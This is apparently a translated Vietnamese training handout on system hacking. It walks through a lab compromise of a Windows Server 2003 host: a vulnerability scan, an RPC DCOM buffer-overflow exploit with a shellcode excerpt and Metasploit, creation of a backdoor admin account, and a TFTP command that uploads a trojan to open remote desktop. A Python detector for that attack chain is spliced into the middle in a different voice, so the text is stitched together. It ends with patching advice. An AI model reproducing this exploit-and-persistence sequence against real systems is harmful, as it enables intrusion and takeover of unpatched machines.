System Hacking

iSPACE IT Training Center 137C Nguyen Chi Thanh Str - Dist 3 - HCMC

1. INTRODUCTION TO SYSTEM HACKING:

System hacking covers the techniques for obtaining usernames and passwords, escalating privileges inside the system, using a keylogger to collect information about the target, or uploading a Trojan to open a port for the attack.
For obtaining local usernames and passwords, the hacker can crack the passwords with software installed on that machine, or boot a Knoppix CD to retrieve the syskey; the next step is decrypting the SAM file to obtain the hashes of the system accounts. The hacker can also capture usernames and passwords over SMB and NTLM with a sniffer (eavesdropping on the network).
For privilege escalation inside the system, the hacker can use vulnerabilities in Windows or in the software installed on the system to obtain Admin rights and control the system.

2. ATTACKING A WINDOWS SERVER 2003 MACHINE THROUGH OS & APPLICATION VULNERABILITIES:

We use tools to discover information about the machine to be attacked.
Now we use Retina Security Scanner Enterprise to scan the victim machine for information, the vulnerabilities it has, and the ports it has open.
Target machine: 192.168.1.210
Local machine: 192.168.1.10

Steps of the scan to identify the operating system, the vulnerabilities, and the open ports

Scan results obtained from the victim machine 192.168.1.210

Report Summary

Scanner Name:     iSPACE          Machines Scanned:             1
Scanner Version:  5.0.10.1076     Vulnerabilities Total:        11
Scan Start Date:  3/18/2008       High Risk Vulnerabilities:    7
Scan Start Time:  3:47:13 PM      Medium Risk Vulnerabilities:  4
Scan Duration:    0h 12m 58s      Low Risk Vulnerabilities:     0
Scan Name:        Scanning        Information Only Audits:      2
Scan Status:      Completed       Credential Used:              iSPACE

[Charts from the report: Top 5 Most Vulnerable Hosts; Num. of Vulnerabilities By Risk; % of Vulnerabilities By Risk; Avg. of Vulnerabilities By Risk]

Scan results at the victim machine:
Windows Server 2003
Top most dangerous vulnerabilities:
Windows RPC DCOM interface buffer overflow
Windows RPC DCOM multiple vulnerabilities
Apache 1.3.27 HTDigest Command Execution
We can exploit these vulnerabilities to obtain a command shell through port 135.
These vulnerabilities exist because this Windows Server 2003 has not been updated with the hotfixes and service pack.
The Apache 1.3.27 web server version is also vulnerable and must be updated to a newer version.



[Figure: top dangerous vulnerabilities reported by the scanner]

[Figure: top open ports on the victim machine]

So we have identified that the operating system of 192.168.1.210 is Windows Server 2003, which ports are open, and which vulnerabilities the system has. This is the information needed to recognise the vulnerabilities and to patch the ones in the list of the most dangerous. From the list of vulnerabilities we will exploit the 7th one, Windows RPC DCOM interface buffer overflow, using port 135.
We go on the internet to find exploit code for this vulnerability and compile that code into an .exe file to run.
The code for exploiting the vulnerability: MS- windows DCOM-RPC2 Universal Shellcode

Compile this code into an .exe file to run it, or use Metasploit, which already includes this vulnerability, to exploit it (below is an excerpt of the code used to obtain the shell).

This is the code used to exploit the vulnerability (excerpt)

The process of obtaining a command shell from the machine 192.168.1.210 (Windows Server 2003) with Metasploit

; Segment type: Pure code
; seg000 segment byte public 'CODE' use32
; assume cs:seg000
; assume es:nothing, ss:nothing, ds:nothing, fs:nothing, gs:nothing
.386
assume cs:seg000
var_29C = byte ptr -29Ch
var_28C = byte ptr -28Ch
var_25F = byte ptr -25Fh
var_254 = dword ptr -254h
var_250 = dword ptr -250h
var_24C = dword ptr -24Ch

seg000 segment byte public 'CODE' use32

beginofpackeddata:                      ; CODE XREF: UnXORFunc+17j
        push    ebp
        mov     ebp, esp
        sub     esp, 80h
        mov     esi, esp
        call    sub_191
        push    eax
        mov     eax, fs:[18h]           ; TEB
        mov     eax, [eax+30h]          ; TEB -> PEB
        lea     eax, [eax+18h]
        mov     ebx, 190000h
        mov     eax, ebx
        pop     eax
        mov     esi, eax
        push    dword ptr [esi]
        push    0E8AFE98h
        call    GetFunctionBYName       ; WinExec
        mov     [esi+0Ch], eax
        push    dword ptr [esi]
        push    73e2d87eh
        call    GetFunctionBYName       ; ExitProcess
        mov     [esi+10h], eax

(continued)

Alternatively, the Metasploit tool, which already includes this vulnerability, can be used to attack the victim machine.
This is the process of using Metasploit to attack the victim machine 192.168.1.210

So, after the attack we have obtained a command shell on the victim machine and have taken control of the system. Now we can create users in the system and do whatever we want.
This is the C: drive of the Windows Server 2003

Use the tasklist command in the command shell to show the services running on the victim machine

Now we will create a user in the system for remote access.
The process of creating a user and elevating its privileges in order to take control of the system

Elevate the created user into the system's administrators group, so that the system can be managed through remote connections, since only a user in the administrator group can remote into the machine.

Once there is a user in the system's administrator group, we try to remote into the victim machine, but the remote port is not open on this machine, so a trojan has to be uploaded to open the port.
The remote connection fails

Now we use TFTP to upload a trojan to the victim machine in order to open the port for remote desktop.
The process of using Cisco TFTP Server to upload a trojan that opens the remote desktop port
TFTP -i 192.168.1.10 GET c:\trojan.vbs 192.168.1.210

Start the Telnet service on the victim machine to connect and run the trojan that was just uploaded

Use the dir command to check whether the trojan has been uploaded

Run the trojan in the Telnet console

Perform remote desktop with the created user
User: ispacehacking  password: hacking

The remote session succeeds; we are in the victim machine through remote desktop.
The Windows Server 2003 desktop
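The whole post-exploitation chain above (create a user, add it to Administrators, log in over remote desktop) leaves a distinctive trail in the Security event log, which is what a defender should be alerting on. The Python script below is an added example, not part of the original training document. Its log lines are constructed in a simplified "timestamp|event_id|key=value;..." form (not the real event log export format) and the field names are this example's assumptions; the event IDs are the Windows 2000/2003 Security log values (624 = user account created, 636 = member added to a security-enabled local group, 528 = successful logon, with logon type 10 = remote interactive / Terminal Services). The rule correlates account creation with a privilege grant or a remote desktop logon by that same account inside a short window.

```python
"""Detect "new account -> admin group -> remote desktop" in Windows Server
2003 Security log events (added example)."""
import re
from datetime import datetime, timedelta
from typing import Dict, List

# Constructed sample log. The first three lines mirror the chain shown on the
# page (account created from a SYSTEM shell, added to Administrators, then an
# RDP logon); the rest is ordinary admin activity that must not alert.
SAMPLE_LOG = """\
2008-03-18 15:58:02|624|caller=NT AUTHORITY\\SYSTEM;target=ispacehacking
2008-03-18 15:58:40|636|caller=NT AUTHORITY\\SYSTEM;member=ispacehacking;group=Administrators
2008-03-18 16:05:11|528|user=ispacehacking;logon_type=10;source=192.168.1.10
2008-03-18 16:20:00|624|caller=ISPACE\\hr_admin;target=jdoe
2008-03-18 16:21:00|636|caller=ISPACE\\hr_admin;member=jdoe;group=Users
2008-03-18 17:30:00|528|user=jdoe;logon_type=2;source=-
"""

LINE_RE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2})\|(?P<eid>\d+)\|(?P<kv>.*)$")


def parse_line(line: str) -> Dict[str, str]:
    """Split one constructed log line into a flat dict of string fields."""
    m = LINE_RE.match(line)
    if not m:
        raise ValueError("unparseable line: %r" % line)
    ev = {"ts": m["ts"], "eid": m["eid"]}
    for pair in m["kv"].split(";"):
        k, _, v = pair.partition("=")
        ev[k] = v
    return ev


def detect(log_text: str,
           window: timedelta = timedelta(minutes=30),
           admin_groups=("Administrators",)) -> List[Dict[str, str]]:
    """Alert when an account is added to an admin group (636) or logs on via
    remote desktop (528, type 10) within `window` of its creation (624)."""
    created: Dict[str, datetime] = {}      # account (lower-case) -> creation time
    alerts: List[Dict[str, str]] = []
    for raw in log_text.splitlines():
        if not raw.strip():
            continue
        ev = parse_line(raw)
        ts = datetime.strptime(ev["ts"], "%Y-%m-%d %H:%M:%S")
        eid = int(ev["eid"])
        if eid == 624:
            created[ev["target"].lower()] = ts
            continue
        if eid == 636:
            account = ev["member"]
            suspicious = ev["group"] in admin_groups
        elif eid == 528 and ev.get("logon_type") == "10":
            account = ev["user"]
            suspicious = True
        else:
            continue
        born = created.get(account.lower())
        if suspicious and born is not None and timedelta(0) <= ts - born <= window:
            alerts.append({
                "severity": "critical" if eid == 528 else "high",
                "event_id": str(eid),
                "account": account,
                "age": str(ts - born),
                "detail": ("remote desktop logon from %s" % ev["source"]) if eid == 528
                          else ("added to local group %s by %s" % (ev["group"], ev["caller"])),
            })
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE_LOG):
        print(alert)
```

On the sample it raises two alerts for ispacehacking (added to Administrators 38 seconds after creation; remote desktop logon 7 minutes later from 192.168.1.10) and nothing for jdoe. A real deployment would read the exported event log instead of the constructed lines, and on Windows Vista and later the same events carry IDs 4720, 4732 and 4624; the correlation logic is unchanged.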
3. CONCLUSION:
Scanning software is very important to a hacker for discovering the vulnerabilities of a system. Once the vulnerabilities are identified, the hacker can use Metasploit or code available on the internet to attack and take control of the target machine. But scanning software is also a useful tool for the Admin managing the system, helping the system Admin assess the security level of the system and check for the vulnerabilities that keep appearing.
4. HOW TO PREVENT LOCAL HACKING VULNERABILITIES
Regularly visit websites such as securityfocus.com and microsoft.com/technet to follow the hotfix and service pack updates for the system.
Always update the applications on the machine to the newest versions.
Use the built-in Windows Update tool to update the system.